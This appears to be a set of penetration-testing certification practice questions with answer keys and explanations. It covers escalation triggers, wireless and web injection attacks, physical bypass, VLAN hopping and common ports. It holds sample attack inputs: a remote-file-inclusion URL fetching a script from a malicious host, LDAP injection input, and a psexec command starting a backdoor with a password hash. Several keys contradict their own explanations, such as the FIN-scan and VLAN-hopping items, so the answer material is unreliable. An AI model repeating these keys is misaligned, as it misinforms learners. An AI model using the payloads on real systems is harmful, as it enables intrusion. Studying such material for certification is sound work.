
A.Unexploited findings
B.Indicators of compromise
C.Completion of a testing stage
D.Critical findings

A

A.Unexploited findings

Explanation:
Unexploited findings is NOT a communication trigger. This information would be contained in the final report.

Communication triggers include: stages of the penetration test, critical findings, and indicators of compromise. These are standard communication triggers. Some organizations may include other communication triggers as part of the engagement plan. It is important that the penetration tester understands these triggers and acts accordingly.

26
Q
  1. WEP/WPA cracking
  2. Warchalking
  3. Evil twin

A.A rogue access point is configured with the same SSID as a valid access point.
B.Mathematical algorithms are used to determine the pre-shared key used on the access point.
C.SSID and other authentication details regarding a wireless network are placed in a prominent place.

A

1B
2C
3A

The wireless security issues should be matched with the descriptions in the following way:

WEP/WPA cracking - Mathematical algorithms are used to determine the pre-shared key used on the access point. This is considered a WEP/WPA attack.
Warchalking - SSID and other authentication details regarding a wireless network are written down in a prominent public place.
Evil twin - A rogue access point is configured with the same SSID as a valid access point.
27
Q

When performing a compliance-based assessment, which of the following will present the largest challenges to obtaining complete results?

A.lack of assessment tools
B.limited time spent on assessment
C.limited network access
D.limited knowledge by assessor

A

C.limited network access

Explanation:
In many compliance-based assessments, restrictive rules of engagement, specifically those that limit the areas of testing, are the biggest impediment to good results. Another key problem can be limited access to certain storage areas.

There is no lack of assessment tools available to perform a good assessment. That is not the biggest impediment to good results.

While the knowledge and skill of the assessor will certainly have an effect on results, history has not shown this to be the biggest impediment to good results.

Finally, while there must be proper time given for the assessment, lack of time is not typically the main issue with incomplete results of a compliance-based assessment.

28
Q

While performing a penetration test, you encounter several issues that you plan to document in the final report. However, you need to ensure that management is immediately notified of any critical issues documented in the communication escalation path.

Which of the following is MOST likely to result in immediate communication to management?

A.Unpatched applications exist on a system marked for retirement.
B.A finding was discovered regarding an out-of-scope system.
C.A network compromise has previously occurred about which management knows nothing.
D.Encrypted personally identifiable information (PII) was discovered on several systems.

A

C.A network compromise has previously occurred about which management knows nothing.

Explanation:
Of the situations given, only the network compromise that has previously occurred about which management knows nothing should be immediately reported to management.

None of the other findings are critical, nor are they indicators of compromise. Critical findings and indicators of compromise are the only discoveries that should trigger communication, unless otherwise noted in the communication escalation directions.

Issues with out-of-scope systems should be noted in the final report. However, out-of-scope systems should not be thoroughly tested. Often you may accidentally discover an issue with an out-of-scope system, but issues with out-of-scope systems should only be reported and not investigated further unless priorities change.

Encrypted PII will often exist on multiple systems. However, encrypted PII is usually considered protected (unless a compromised encryption algorithm is being used). This issue would be included in the final report and only considered critical if 1) the PII should not be on the system on which it was discovered, or 2) the encryption algorithm being used to protect the PII has been compromised or is no longer considered secure.

Unpatched applications may exist on systems marked for retirement. However, this is usually not a critical issue because systems marked for retirement are often not updated regularly. The tester should note the discovery in the final report and should instruct the organization that the soon-to-be retired system should be updated if retirement does not take place in the near future (next three months or so).

Communication triggers should include: critical findings, stages, and indicators of prior compromise. All other discoveries should simply be included in the final report.

29
Q

Sam is reviewing web server logs after an attack. He discovers that many records contain semicolons and apostrophes in queries from end users. What type of attack should Sam suspect?

A.Cross-site scripting
B.LDAP injection
C.Buffer overflow
D.SQL injection

A

D.SQL injection

Explanation:
In an SQL injection attack, the attacker uses a web application to gain access to an underlying, backend database. Semicolons (;) and apostrophes (‘) are characteristics of these attacks. For example, the single quote in SQL is a delimiter, meaning it ends any current SQL string. This is important for attackers to craft true conditions or true statements to bypass authentication or pull more information from a database than allowed.

Lightweight Directory Access Protocol (LDAP) injection is an attack that sends malicious LDAP queries to a web application and could result in sensitive data disclosure or authentication bypass.

Cross-site scripting (XSS) attacks are a type of injection attack where a malicious script is injected into a website. Because the attacker is feeding the script into a trusted website, the end user’s browser has no way to know that the script is malicious and will execute the script.

A buffer overflow attack revolves around malicious code requiring more memory than is allocated by a buffer. (A buffer is a memory allocation that is designed to hold a finite amount of data.) In other words, the attacker is trying to write more data into an application’s pre-built buffer than it was intended to hold. When an attacker can add data that exceeds the buffer limits, the extra information spills over past the buffer, into adjacent memory where it can then crash the system or execute malicious code.

30
Q

Which of the following attack types takes advantage of an electronic door opening from the inside when someone approaches?

A.shoulder surfing
B.piggybacking
C.egress sensor attack
D.fence jumping

A

C.egress sensor attack

Explanation:
An egress sensor attack takes advantage of an electronic door opening from the inside when someone approaches. It does not use shimming but usually uses an “under the door tool” to cause an electronic door to open due to motion on that side of the door.

Fence jumping is exactly what it sounds like. This can only be prevented by making the fence tall enough to discourage a determined attacker. Another option is to have the top of the fence strung with razor wire.

Shoulder surfing is the unauthorized viewing of sensitive information on another user’s screen.

Piggybacking is a social engineering attack that involves entering a facility which you are not authorized to enter by doing so when an authorized person opens the door using their credentials stored on a key card.

Often you will see the terms piggybacking and tailgating used synonymously. However, there is a subtle difference between the two. Piggybacking implies that the person who has opened the door with their credentials knows the individual following them in through the secure door. Tailgating means that an individual following through the door is unknown by the person with credentials.

31
Q

You are preparing a penetration report. One of the findings indicated that a system is susceptible to SQL injection attacks.

Which of the following mitigation strategies should you recommend?

A.Implement a password complexity policy.
B.Sanitize user input.
C.Implement multi-factor authentication.
D.Harden the SQL server.

A

B.Sanitize user input.

Explanation:
You should recommend that the company sanitizes user input to prevent SQL injection attacks. You could also recommend that the company parameterizes queries.

Implementing a password complexity policy is the appropriate remediation if you discover that weak passwords are being used, which is not the case here.

Implementing multi-factor authentication is the appropriate remediation if you discover that only a single type of authentication is being used. Multi-factor authentication can include: something you know (username and password), something you have (smart card), something you are (biometrics), somewhere you are (GPS or particular host), and something you do (signature dynamics or typing patterns).

Hardening the SQL server is the appropriate remediation if you find unnecessary open services. Hardening steps include:

Remove unnecessary services and applications.
Remove unnecessary accounts.
Close unnecessary ports.
Implement patch management.
Deploy security templates and group policies.
Implement configuration baselines using network access control.
32
Q

While attacking InterConn’s network, you see an attack vector against their server using the following address:

http://example.interconn.com/example.php?file=http://www.malicious-example.com/malicious.php

What attack is being used here?

A.SQL injection
B.XSS
C.Directory traversal
D.RFI

A

D.RFI

Explanation:
Remote file inclusion (RFI) is being used here. RFI is an attack vector that was more popular several years ago, but unfortunately people and companies are still lazy about sanitizing input in PHP: Hypertext Preprocessor (PHP) applications. PHP is a general-purpose programming language used with HTML to create web sites. You can still find ways of running shells in the scenario being described.

File inclusions themselves are normal, and useful, parts of a server-side scripting language. They are there to help in maintenance, update, and for code-editing. They are there also to allow web applications to pull and read files from the server’s file system. They are vulnerable to LFI and RFI attacks.

Local file inclusion (LFI) and remote file inclusion (RFI) are similar to the nefarious cross site scripting (XSS) attacks. All of them are forms of code injection, with LFI being less sophisticated and therefore easily preventable. RFI is a method which allows an attacker to employ a script to include a remotely hosted file on the web server. LFI is very similar to RFI, the only difference being that to carry out the LFI attack, the attacker has to use local files on the current server, and RFI uses remote files.

This is not a directory traversal attack. Directory traversal is a way of gaining unauthorized file system access. In a directory traversal attack, also known as path traversal, an attacker enters information in a web form, URL address line, or another input method that gives them access to a file or directory that they shouldn’t have access to, such as adding some periods and a backslash into the address to get to the parent directory.

This is not a cross-site scripting (XSS) attack because XSS is a code injection attack that targets web application input and client-side scripting vulnerabilities. It comes in many flavors such as the more common versions: Stored cross-site scripting (XSS) or persistent XSS, and it occurs when someone has implanted malicious code into the site that is always run when someone accesses that website. The attacker usually accesses the site via login, message board, or some other type of input.

A SQL injection is a type of injection attack in which malicious SQL statements are injected into an input field in a web request and executed on a database server.

33
Q

A log analysis reveals the following input into a login portal:

Jsmith2)(&)
Admin1

Which type of attack has most likely occurred?

A.Brute Force
B.LDAP Injection
C.XSS
D.SQL Injection

A

B.LDAP Injection

Explanation:
This is an LDAP injection attack. Because LDAP is a protocol that is often used for authentication, the above is an example of an LDAP injection to bypass authentication.

Lightweight Directory Access Protocol (LDAP) injection is an attack that sends malicious LDAP queries to a web application and could result in sensitive data disclosure or authentication bypass. The & symbol will end the query after the first line. So, the attacker is trying to create a condition that effectively asks the back-end database “check to see if we have a valid user named Jsmith2”. If so, allow for authentication. The attacker doesn’t need to enter a proper, matching password since the query is ended prematurely.

A brute force attack is a technique used to figure out a user’s credentials by trying every possible combination until it cracks the user’s credentials.

Cross-site scripting (XSS) attacks are injection attacks where malicious script is injected into a website. Because the attacker is feeding the script into a trusted website, the end user’s browser has no way to know that the script is malicious and will execute the script. An example of a cross site script would be Deface();.

In a SQL injection attack, the attacker uses a web application to gain access to an underlying, backend database. Semicolons (;) and apostrophes (‘) are characteristics of these attacks. For example, the single quote in SQL is a delimiter, meaning it ends any current SQL string. This is important for attackers to craft true conditions or true statements to bypass authentication or pull more information from a database than allowed.

34
Q

Your network contains an Active Directory domain named nutex.com. The network has a Windows Server 2012 server, named DNS1, that has the AD DS and DNS server roles installed. You have several visitors and guests visiting your office. You notice that users that are not part of the domain are registering A records in the nutex.com zone.

You need to prevent computers that are not members of the domain from registering with DNS. Which PowerShell script should you run?

A.Set-DnsServerPrimaryZone -Name "nutex.com" -DynamicUpdate "Secure"
B.Set-DnsServerPrimaryZone -Name "nutex.com" -ReplicationScope "Forest"
C.Set-DnsServerPrimaryZone -Name "nutex.com" -SecondaryServers 10.0.0.2
D.Set-DnsServerPrimaryZone -Name "nutex.com" -DynamicUpdate "NonsecureAndSecure"

A

A.Set-DnsServerPrimaryZone -Name "nutex.com" -DynamicUpdate "Secure"

Explanation:
You should run the Set-DnsServerPrimaryZone -Name "nutex.com" -DynamicUpdate "Secure" command from PowerShell. This command will specify that the nutex.com zone should allow only secure dynamic updates, rather than secure and nonsecure updates. Secure dynamic updates prevent users who are not members of the domain from registering in the zone.

If you had a user who was in a workgroup with the same name as the zone and the zone was configured for dynamic updates, then the user’s computer could register a host record in the zone. In this scenario, you know the zone is stored on a server that is also a domain controller because it has the AD DS role installed. A DNS server that is a domain controller can have a zone that is an Active Directory-integrated zone. An Active Directory-integrated zone can support secure dynamic updates, which only allow computers that are members of the domain to create a host record in the zone.

All other answers are incorrect, because they do not change the properties of the zone to only support secure dynamic updates.

You should not run the Set-DnsServerPrimaryZone -Name "nutex.com" -DynamicUpdate "NonsecureAndSecure" command from PowerShell. This command will specify that the nutex.com zone allow both secure and nonsecure dynamic updates.

You should not run the Set-DnsServerPrimaryZone -Name "nutex.com" -SecondaryServers 10.0.0.2 command from PowerShell. This command adds the address and name of another DNS server that is allowed to receive zone transfers, which would be a required step (either in the GUI or using PowerShell) to make it possible for a second DNS server to host a secondary copy of the zone.

You should not run the Set-DnsServerPrimaryZone -Name "nutex.com" -ReplicationScope "Forest" command from PowerShell. This command will change the scope of replication for the nutex.com zone to forest-wide.

35
Q

As part of a WLAN pen test, your team has set up an AP solely for the purpose of sniffing and capturing probe requests sent by stations in your environment. The ultimate aim of the test is to generate SSIDs on the AP to which it is hoped that the stations will attempt to associate.

What type of attack is this?

A.Deauthentication
B.KARMA
C.KRACK
D.Downgrade

A

B.KARMA

Explanation:
This is a Karma Attacks Radioed Machines Automatically (KARMA) attack. In this attack the goal is to enumerate and generate SSIDs which the stations (which can include phones, laptops, and anything with a radio) have saved in their Preferred Network List (PNL). These are network profiles saved in the station complete with credentials that stations attempt to locate with probe requests at all times when they are not associated with an AP.

This is not a key reinstallation attack (KRACK). When successfully exploited, that attack, which targets WPA and WPA2, could allow unauthenticated attackers to reinstall a previously used encryption or integrity key. They can then use the key to decrypt captured traffic. Many capture utilities have the ability to use the key to decrypt the traffic in real time as it is captured.

This is not a downgrade attack. This attack forces a system to use a weaker encryption protocol, one where hopefully for the tester or hacker it will be easier to crack the key. The Padding Oracle On Downgraded Legacy Encryption (POODLE) vulnerability in OpenSSL is an example.

This is not a deauthentication attack. That is a DoS attack in which the tester or hacker sends deauthentication frames, which causes stations to disconnect from the AP making wireless communication impossible.

36
Q

You are running an Nmap TCP FIN scan against a target. The scan output shown below indicates that port 53 is open.

Which of the following occurred that would indicate that the port is open?

A.No response received
B.TCP FIN received
C.RST packet received
D.SYN/ACK received

A

B.TCP FIN received

Explanation:
The given exhibit shows that the nmap command is being run with the -v -sF parameters. The -sF parameter runs a TCP FIN scan. With a TCP FIN scan, the TCP FIN bit is set in the packet header. The expected behavior when receiving such a packet is for a receiving target with an open port to just ignore or drop the packet. Therefore, if there is no response, that means the packet made it to its destination and was then dropped, which indicates an open port.

The answer is not No response received. It is important to note that a non-response doesn’t always mean an open port because a basic TCP FIN scan cannot distinguish between an open port versus a filtered port.

Also note that a TCP FIN scan is not useful when scanning Windows-based systems, as it will respond with RST packets, no matter if the port is open or closed.

37
Q

A web application is finally finished. The developer wants to test the code of the application for errors and weaknesses before it goes out to a full Q/A.

Which of the following scan processes should the software developer perform? (Choose two.)

A.Dynamic
B.Static
C.Compliance
D.Vulnerability

A

A.Dynamic
D.Vulnerability

Explanation:
The software developer should perform a dynamic vulnerability scan. Dynamic scans are performed while the software is running, preferably in a sandbox or non-production environment, and do not have back-end access to the code.

Vulnerability scanning is a category of tools under the Dynamic Application Security Testing (DAST) tools. It is always best to run vulnerability scanning against a web application because it is going to find issues such as cross-site scripting, SQL injection, and command injection. A good example of this tool is Open Web Application Security Project Zed Attack Proxy, or OWASP ZAP.

Static analysis is what the name implies, investigating something when it is not up and running. Usually this involves looking under the hood, tearing apart the code, and seeing what would happen if it was alive and running. This analysis can be done on a number of programs, even malware, where it’s considered safer and/or won’t be intrusive. Hopefully a static analysis was already performed before releasing the software online, or else the vulnerability scan will find many issues.

Compliance scans, by their very nature, are only interested in whatever compliance rules your company needs to follow. For instance, if you are a hospital or medical clinic, you need to be in compliance with HIPAA. In this scenario, the developer should perform an overall vulnerability/dynamic scanning of this web app for errors and weaknesses.

39
Q

Which of the following security issues can be mitigated with deadbolts?

A.lock picking
B.entry key theft
C.lock bypass
D.failsafe

A

C.lock bypass

Explanation:
Lock bypass is a technique where the lock mechanism is never engaged or attacked but rather is bypassed. An example is where an attacker inserts a sprung steel device to retract the spring-loaded catch that restrains the shackle, preventing it from operating. The use of deadbolts helps avoid lock bypass. The locking mechanism and bolt are operated by the key. This prevents the device from being opened without the locking mechanism itself being properly operated.

Lock picking cannot be prevented by deadbolt. This is an attack on the lock mechanism itself rather than an attempt to go around the mechanism.

Entry key theft cannot be mitigated with deadbolts because the stolen key will operate and unlock the deadbolt.

Failsafe is a principle by which an electronic door defaults to an unlocked state when power is lost to the door. This cannot be prevented with deadbolts, as the deadbolt will open when power is lost.

40
Q

In the process of performing a pen test, one of your associates spent a significant amount of time outside in the smoking area near the trash bins discussing a wide range of topics with employees, such as favorite sports teams, favorite bands, and other topics about which the employees seemed passionate.

What is this social engineering technique called?

A.spear phishing
B.dumpster diving
C.pretexting
D.elicitation

A

D.elicitation

Explanation:
This information gathering technique is called elicitation. It is the art of getting information without directly asking for it. Using this technique testers (or hackers) use open-ended questions to prompt users to share information while in an unguarded mental state. When discussing topics of interest to the users, they often share data that could be useful in compromising a network, such as data bits that could be used in passwords (favorite team, favorite band).

While it did happen near the trash bins, this is NOT dumpster diving. This is the process of going through the trash to locate written material that may be helpful, such as network diagrams and organizational charts.

This is not spear phishing. Spear phishing is a form of phishing that is targeted to a single individual rather than to thousands of users.

This is not pretexting. Pretexting is the process of establishing a reason to talk to someone as a method of putting them at ease and lowering their guard. One of the ways of doing this is to present yourself as an IT technician. Pretexting often involves a scam where the liar pretends to need information (such as a password) in order to confirm the identity of the person they are talking to.

41
Q

You are designing a pen test in which you want to see if you can successfully send unsolicited text messages to company smartphones and laptops.

What type of attack are you simulating?

A.RFID cloning
B.Jamming
C.Bluejacking
D.WPS implementation weakness

A

C.Bluejacking

Explanation:
You are testing the likelihood that a Bluejacking attack will succeed. In this attack, the Bluetooth service is utilized to send unsolicited text messages to devices where the Bluetooth service is enabled and the device is left in a discoverable mode.

You are not simulating a WPS implementation weakness attack. This is an attack on the Wi-Fi Protected Setup (WPS) service, which was designed to make attaching new devices to a home wireless network easier by transmitting the WPA or WPA2 PIN to the new device. By using a utility called Reaver, the PIN can be cracked.

You are not simulating an RFID cloning attack. In this attack, RFID tag information is captured wirelessly as it is transmitting between label and reader. In some cases, this cloned information may be that which is required to enter a secure room or area (user badges).

You are not simulating a jamming attack. This is a DoS attack in which the frequency the company AP uses is jammed, preventing all communication with the AP.

42
Q

As a digital forensics investigator you find the following code on a system.

super_code = "pentest+"
new_code = []

# slice [0:6:2] yields the characters at indexes 0, 2 and 4
for letters in super_code[0:6:2]:
    new_code.append(letters + " ")

print(new_code)

What is the correct output of this code?

A.[‘p’, ‘e’, ‘n’, ‘t’, ‘e’, ‘s’, ‘t’]
B.[‘p’, ‘n’, ‘e’]
C.[‘p’, ‘e’, ‘n’, ‘t’]
D.[‘p’, ‘e’, ‘n’, ‘t’, ‘e’]

A

B.[‘p’, ‘n’, ‘e’]

Explanation:
The code starts with the variable super_code being set to pentest+. It then initializes another variable, new_code, but it is set to be an empty list.

The for loop will go through all of the indented code as long as the condition is true. Therefore, in our case, the loop will occur the number of times that there are characters in super_code. Thus, we get eight cycles through the loop. However, the numbers within the brackets change the situation. The three numbers signify the following [starting position: ending position (not inclusive): the step value]. In this question, we have [0:6:2], which in turn means that the letter would be p for the first iteration. Then it would be n because we go from 0 to 2 (due to the step value) and the index value of 2 gives us n. Once again, we go from 2 to 4, which gives us e. Now the step value brings us to 6. However, since the end position is 6, it is not inclusive. Therefore, we are left with p, n, and e.

As the for loop is iterating, each of the letters is appended to the list new_code. The last line calls the print function to print the list new_code.

43
Q

Shimming is an example of which of the following?

A.egress sensor attack
B.lock picking
C.lock bypass
D.badge cloning

A

C.lock bypass

Explanation:
Shimming, in which a thin slip of material is inserted between the door and the lock mechanism, is an example of lock bypass. Lock bypass is a technique where the lock mechanism is never engaged or attacked, but rather is bypassed by inserting a sprung steel device to retract the spring-loaded catch that restrains the shackle, preventing it from operating. The use of deadbolts helps to avoid lock bypass.

Shimming is not an example of lock picking because in lock picking the lock mechanism is attacked, not bypassed.

Shimming is not used in an egress sensor attack. This is an attack that takes advantage of an electronic door opening from the inside when someone approaches. It does not use shimming but usually uses an “under the door tool” to cause an electronic door to open due to motion on that side of the door.

Shimming is not used in security badge cloning. One of the most common techniques to do this is to clone radio-frequency identification tags on the badges.

44
Q

The value of the target has the largest effect on which characteristic of the pen test?

A.rules of engagement
B.budget
C.NDA
D.schedule

A

B.budget

Explanation:
When critical resources, or targets, are high-value or mission-critical, organizations tend to spend more time and money to test these against vulnerabilities. Therefore, the budget is most affected by the value of the target being pen tested.

The value of the target will not impact the schedule. What will impact the schedule is any need to assess resources under heavy loads, which is typically at certain times of the day.

While the rules of engagement can be used to exempt a high-value target from assessment, its value will not affect the rules of engagement if the target needs to be assessed.

Because the NDA typically prohibits the tester sharing any information from the test, the value of a target will not affect the NDA.

45
Q

While attacking the network at InterConn, you were able to do some VLAN hopping around their supposedly segmented networks and you scored a hit.

Which of the following best practices would have helped to protect against VLAN hopping and made the pen tester’s job harder? (Choose all that apply.)

A.Administratively configure access ports as access ports.
B.You should control Spanning Tree features to stop unknown devices or all users from manipulating the controls.
C.Limit the number of MAC addresses learned on a given port.
D.Disable Dynamic Trunking Protocol.

A

B.You should control Spanning Tree features to stop unknown devices or all users from manipulating the controls.
C.Limit the number of MAC addresses learned on a given port.

Explanation:
All of these options are correct. VLAN hopping is a method of gaining access to traffic on other VLANs that would normally not be accessible. There are two primary methods of VLAN hopping: switch spoofing and double tagging.

When you perform a switch spoofing attack, you imitate a trunking switch by sending the respective VLAN tag and the specific trunking protocols.

Double tagging is modifying the Ethernet frame of a packet so that the packet can pass into any VLAN. This works because of default behaviour in many switches and the way they process tags. If you put two VLAN tags on the Ethernet frame, the switch will, by default, strip only the outer tag; the frame is still tagged, so the packet moves on inside the network. Remember that this attack is one way only, since it cannot be performed on the return packet.

Several best practices can help mitigate VLAN hopping and other Layer 2 attacks. The following are a few examples of best practices for securing your infrastructure, including Layer 2:

  • Select an unused VLAN (other than VLAN 1, which is the default) and use it as the native VLAN for all your trunks. Do not use this native VLAN for any of your enabled access ports; there are no default controls in place on it, and it should stay empty so that an attacker who reaches it finds nothing there.
  • Administratively configure access ports as access ports so that users cannot negotiate a trunk.
  • Disable the negotiation of trunking (that is, do not allow Dynamic Trunking Protocol [DTP]).
  • Limit the number of MAC addresses learned on a given port with the port security feature. This locks down the port in its most basic form: the feature remembers the Ethernet MAC address connected to the switch port and allows only that MAC address to communicate on that port. If any other MAC address tries to communicate through the port, port security will disable the port.
  • Control Spanning Tree features to stop users or unknown devices from manipulating the controls. You can do so by using the BPDU Guard and Root Guard features.

Dynamic Trunking Protocol (DTP) is a proprietary Cisco networking protocol that lets switches negotiate trunk links with each other automatically. Because it is not a secure protocol, trunk negotiation should be restricted so that only a sysadmin can enable it.

Following these best practices can help prevent a user from maliciously negotiating a trunk with a switch and then having full access to each of the VLANs by using custom software on the computer.

46
Q

At InterConn, you are running a vulnerability scan during the working day. You are cognizant of the available bandwidth and of how many attack threads are running.

If your goal is to reduce bandwidth usage, which two attacks must you change the settings of or decide not to run, depending on your project scope? (Choose two.)

A.Fragmentation
B.Flooding
C.Decoy
D.Frequency
E.Denial-of-service
A

B.Flooding
E.Denial-of-service

Explanation:
You should either change the settings for or not run denial-of-service (DoS) attacks. These flooding attacks include:

Smurfing: Smurfing is a type of denial-of-service attack that floods the network with a sudden, massive volume of traffic by spoofing and manipulating IP addresses. What sets it apart from an ordinary DoS is its use of broadcast traffic to amplify the attack inside the network to whatever size the attacker wants. Smurfing attacks are less common today because modern networks do not leave broadcast traffic as open as early networks did.
DoS/Ping Flooding: This attack abuses the ping function to send a flood of ICMP echo requests over the target network, causing so much congestion that the target crashes. It does no damage to the network beyond putting it out of commission until the attack stops.
DDoS: When the attack traffic comes from multiple devices, the attack becomes a distributed denial-of-service (DDoS) attack.

These attacks are meant to take a network or device offline. Their purpose is to send so many requests or packets into the network or device that it stops functioning.

Fragmentation is an interesting option to run in Nmap or Zenmap. It is meant to get around firewalls and IDS, so by its very nature is a quiet option to run. It should not greatly affect bandwidth, as opposed to a DoS or flooding attack.

Decoy is another stealth option in Nmap. It acts like a manual VPN in that it makes the target's logs, or anyone listening, see the scan as coming from different IP addresses. Again, this type of test would not greatly affect bandwidth.

Frequency is not too big of an issue; it depends on your project scope and on when your attacks are happening. If they happen during normal office hours, you are not going to stand out by sending a few carefully crafted packets. Where you will stand out is when you flood the network with DoS ICMP packets and grind the place to a halt.

47
Q

A penetration tester was able to convince an employee to give them valid login credentials, including user name and password. You need to prevent this from happening in the future.

Which remediation step should be recommended?

A.Mandate all employees take security awareness training.
B.Increase password complexity requirements.
C.Implement an IPS.
D.Implement multi-factor authentication.

A

A.Mandate all employees take security awareness training.

Explanation:
Mandating all employees take security awareness training should be recommended. The penetration tester used social engineering to obtain valid login credentials. The only way to prevent this type of attack is to ensure that employees understand social engineering attacks.

Implementing multi-factor authentication may reduce the likelihood that a social engineering attack succeeds. However, the employees may still not understand the risk of giving out credentials, so this type of attack could occur again. This is the appropriate remediation if passwords were easy to break using a dictionary or brute force attack.

Implementing an intrusion prevention system (IPS) would ensure that intrusion attempts into the network are detected and stopped. You would implement an IPS to prevent attacks that follow certain patterns or that are already known and documented.

Increasing password complexity would ensure that passwords are stronger. This is an appropriate remediation if passwords were easy to break using a dictionary or brute force attack, but would not help in this scenario.

48
Q

You are designing a pen test that mimics the activities of a script kiddie. Which of the following activities should you most likely perform as this “type of attacker”?

A.Impersonate a technician that was laid off.
B.Steal funds.
C.Post political message on your website.
D.Perform a SQL injection.

A

A.Impersonate a technician that was laid off.

Explanation:
Impersonating a laid-off technician could be done by any of these attacker types, but it is MOST like the actions of a script kiddie. These hackers are not technically advanced, use prepackaged attack tools that they may or may not understand, and rely on well-known methods.

Script kiddies do not have in-depth hacking skills or knowledge, and are limited to using tools and scripts created by other hackers. The traces they leave may ultimately lead to their capture or exposure. Their lack of experience may present a less significant threat than a professional hacker.

A SQL injection takes more skill than a script kiddie typically possesses and is more like the activities of an advanced persistent threat (APT) actor.

Posting political messages on your website is not a normal activity of a script kiddie. This type of attack is common to a hacktivist.

Stealing funds is not usually within the skill of a script kiddie. These are more likely to be the actions of an organized crime syndicate or an insider threat.

49
Q

A pen tester runs the following command to create a persistent connection to a victim’s computer:

C:\sec>psexec \\172.16.0.121 -u chris -p 9345677+D5B8710D7FEEC0F3BF500B33 C:/backdoor.bat
PSExec v1.98 - Execute processes remotely
Copyright 2001-2010 Mark Russinovich
Sysinternals - www.sysinternals.com

Opening socket on port 5555
Backdoor listening on port 5555
Awaiting connection…

What is being accomplished?

A.The attacker is using psexec to connect to the victim’s computer (172.16.0.121), then using the victim’s username and a password hash to start a backdoor .exe file.
B.The attacker is using psexec to connect to the victim’s computer (172.16.0.121), then using the victim’s username and password to drop off a backdoor .exe file.
C.The attacker is using psexec to connect to the victim’s computer (172.16.0.121), then using the victim’s username and password to start a backdoor .exe file.
D.The attacker is using psexec to connect to the victim’s computer (172.16.0.121), then using the victim’s username and password hash to drop off a backdoor .exe file.

A

A.The attacker is using psexec to connect to the victim’s computer (172.16.0.121), then using the victim’s username and a password hash to start a backdoor .exe file.

Explanation:
The attacker is using psexec to connect to the victim’s computer at 172.16.0.121, then using the victim’s username and a password hash to start a backdoor .exe file. The file is already on the system and just needs to be run to maintain persistence.

Note that we have the hash and not the password, but the hash itself is powerful to have because it is what the computer uses to authenticate. Instead of sending the password for the computer to hash and then compare against the stored hash, we send the hash itself straight off for authentication.

Because the file is already on the system, there is no need to drop it off.

We have the password hash (9345677+D5B8710D7FEEC0F3BF500B33), not the password (e.g. P@ssw0rd2). Telling the two apart can be harder when the password is a long random string generated by a password manager like LastPass, but hashes of a given type still have a fixed length and format, so you can usually tell the difference.

50
Q

You find one computer in your victim company’s network has RDP open and enabled. What port should you connect to with your RDP tool of choice?

A.21
B.3389
C.8080
D.2323

A

B.3389

Explanation:
Port 3389 is registered for use by Microsoft Remote Desktop and Remote Assistance connections. “A vulnerability exists in the Remote Desktop Protocol (RDP) where an attacker could send a specially crafted sequence of packets to TCP port 3389 which can result in RDP accessing an object in memory after it has been deleted.” - CVE-2012-2526 and NIST/CVE-2012-2526

It is not port 8080, which does exist. This port is a common alternative HTTP port used for web traffic and HTTP web proxies. Some broadband routers run a web server on port 8080 for remote management.

It is not port 2323, which is used for a Voice over Internet Protocol (VoIP) application (Akuvox R50P) running a Telnet service. It is very vulnerable in most cases, and the application cannot be turned off, and the credentials cannot be changed.

It is not port 21, which is of course FTP. FTP is also very vulnerable if not secured properly because it transmits everything in plaintext.

There are a total of 65,535 ports in TCP/IP, any of which can be exposed to attack. You should know the following commonly used ports and protocols.

    FTP - ports 20 and 21
    SSH, SCP, and SFTP - port 22
    Telnet - port 23
    SMTP - port 25
    TACACS - port 49
    DNS server - port 53
    DHCP - ports 67 and 68
    TFTP - port 69
    HTTP - port 80
    Kerberos - port 88
    POP3 - port 110
    NetBIOS - ports 137-139
    IMAP4 - port 143
    SNMP - port 161
    LDAP - port 389
    SSL and HTTPS - port 443
    SMB - port 445
    LDAP with SSL - port 636
    FTPS - ports 989 and 990
    Microsoft SQL Server - port 1433
    Point-to-Point Tunneling Protocol (PPTP) - port 1723
    RDP and Terminal Services - port 3389
51
Q

While performing a penetration test, a contractor discovers a vulnerability that is being actively used to attack the company’s Web server. The contractor knows how to implement the mitigation for the vulnerability and has the appropriate access to do so. Which two actions should the contractor take? (CHOOSE TWO)

A.Document the findings with an executive summary, recommendations, and screenshots of the vulnerability.
B.Notify management regarding the findings and suggest the appropriate mitigation.
C.Log in and deploy the appropriate mitigation.
D.Escalate the issue according to the rules of engagement and suggest the appropriate mitigation.
E.Shut down the Web server until the appropriate mitigation can be deployed.

A

A.Document the findings with an executive summary, recommendations, and screenshots of the vulnerability.
D.Escalate the issue according to the rules of engagement and suggest the appropriate mitigation.

Explanation:
The contractor should escalate the issue according to the rules of engagement and suggest the appropriate mitigation. He should also document the findings with an executive summary, recommendations, and screenshots of the vulnerability. Escalation is an appropriate action based on the rules of engagement, and documentation is an appropriate action because this vulnerability is a finding of the penetration test.

The contractor should not log in and deploy the appropriate mitigation. Rules of engagement rarely include deploying mitigations, especially when a contractor is being used. Rules of engagement may include approval to deploy mitigations if an internal penetration test is being completed.

The contractor should not notify management directly regarding the findings and suggest the appropriate mitigation. Management will only want the details in the executive summary and is not usually involved in the escalation procedures documented in the rules of engagement.

The contractor should not shut down the Web server until the appropriate mitigation can be deployed. The rules of engagement do not usually include taking the appropriate precautions or deploying mitigations unless an internal penetration test is being completed.

52
Q

Which of the following situations is LEAST likely to have a requirement of immediate communication with the system owner if discovered during a penetration test?

A.The system logs indicate that a prior unauthorized compromise has occurred.
B.The system requires some hardening.
C.The system contains unencrypted personally identified information (PII).
D.The system becomes unavailable during the penetration test.

A

B.The system requires some hardening.

Explanation:
The LEAST likely situation to need immediate communication with the system owner would be that the system requires some hardening. This is a common finding during a penetration test and would not have as high a priority as the other listed scenarios. This type of information would simply be included in your final report.

The other issues are more likely to require immediate communication as part of the rules of engagement. Communication requirements are documented early in the project. In most cases, testers would communicate immediately with the system owner if critical issues were discovered.

If a system contains unencrypted personally identifiable information (PII), the tester should contact the system owner unless the tester was informed of this condition prior to the test.

If system logs indicate that a prior unauthorized compromise has occurred, the tester should immediately contact the system owner. Compromises should always be considered critical issues that trigger immediate communication.

If a system becomes unavailable during the penetration test, the tester should immediately contact the system owner. Unavailable systems cannot be properly tested.

53
Q

An attacker is using the Yersinia application to exhaust the IP address pool available from a company’s DHCP server. After sending a high volume of DHCPDISCOVER packets and running the DHCP server out of addresses in the DHCP pool, what should the attacker do next?

A.Perform DHCP snooping.
B.Set up a rogue DHCP server.
C.Flood the server with DHCPOFFER packets.
D.Send additional DHCPDISCOVER packets.

A

B.Set up a rogue DHCP server.

Explanation:
